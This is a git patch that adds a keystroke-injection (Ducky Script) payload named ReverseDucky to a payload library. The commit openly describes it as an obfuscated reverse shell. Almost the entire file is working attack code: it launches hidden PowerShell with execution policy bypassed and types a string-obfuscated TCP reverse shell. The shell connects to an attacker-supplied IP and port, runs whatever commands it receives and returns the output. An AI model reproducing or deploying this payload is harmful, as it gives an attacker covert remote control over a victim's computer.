From 389a11d5ade19c6e5b959f3cef7199df7e3d7f3b Mon Sep 17 00:00:00 2001
From: 0iphor13 <79219148+0iphor13@users.noreply.github.com>
Date: Sat, 17 Jul 2021 21:15:35 +0200
Subject: [PATCH] ReverseDucky

An obfuscated reverse shell, executed directly in powershell, hidden in the background.
---
 .../payloads/remote_access/ReverseDucky.txt | 33 +++++++++++++++++++
 1 file changed, 33 insertions(+)
 create mode 100644 library/payloads/remote_access/ReverseDucky.txt

diff --git a/library/payloads/remote_access/ReverseDucky.txt b/library/payloads/remote_access/ReverseDucky.txt
new file mode 100644
index 0000000..fc5ec48
--- /dev/null
+++ b/library/payloads/remote_access/ReverseDucky.txt
@@ -0,0 +1,33 @@
+DELAY 1500
+GUI r
+DELAY 500
+STRING powershell -NoP -NonI -W hidden -Exec Bypass
+DELAY 250
+ENTER
+
+DELAY 200
+STRING SeT-ITeM VARIABLE:Q528Yl ( [TYpE]("{3}{0}{1}{2}" -F '.','eN','cOdinG','TexT') ) ;${clie
+DELAY 200
+STRING NT} = &("{1}{0}{2}" -f 'Objec','New-','t') ("{6}{3}{4}{0}{7}{1}{2}{5}{8}" -f'm','.S','oc
+DELAY 200
+STRING k','s','te','e','Sy','.Net','ts.TCPClient')(("{4}{1}{3}{0}{2}" -f'*3RD BLOCK*','.*2ND BLOCK*','.*4TH BLOCK*','.','*FIRST BLOCK*'),P
+DELAY 200
+STRING ORT);${sTReAM} = ${cliEnt}.("{1}{2}{0}" -f'tream','G','etS').Invoke();[byte[]]${byteS} = 0..655
+DELAY 200
+STRING 35|&('%'){0};while((${I} = ${STReAM}.("{0}{1}"-f 'R','ead').Invoke(${bYtes}, 0, ${ByTES}."lENgt
+DELAY 200
+STRING h")) -ne 0){;${DATa} = (.("{3}{2}{1}{0}" -f 'ect','bj','w-O','Ne') -TypeName ("{2}{0}{3}{4}{1
+DELAY 200
+STRING }"-f 'Tex','IEncoding','System.','t','.ASCI'))."GEtStrING"(${byTes},0, ${I});${senDBaCk} = (.("{0
+DELAY 200
+STRING }{1}"-f'i','ex') ${DATa} 2>&1 | .("{0}{2}{1}"-f 'Out-Str','ng','i') );${SendBACK2} = ${sENDBAc
+DELAY 200
+STRING K} + 'PS ' + (.("{1}{0}" -f 'd','pw'))."pATH" + '> ';${sENDbyte} = ( ( GI VaRiABLE:Q528YL )."vA
+DELAY 200
+STRING LuE"::"ASciI").("{2}{1}{0}"-f 'es','t','GetBy').Invoke(${SENdBaCK2});${STREam}.("{1}{0}"-f 't
+DELAY 200
+STRING e','Wri').Invoke(${sEnDBYTE},0,${SENdBYTE}."LengtH");${sTReAM}.("{1}{0}" -f 'lus
+DELAY 200
+STRING h','F').Invoke()};${cliENt}.("{1}{0}"-f'e','Clos').Invoke()
+DELAY 200
+ENTER
\ No newline at end of file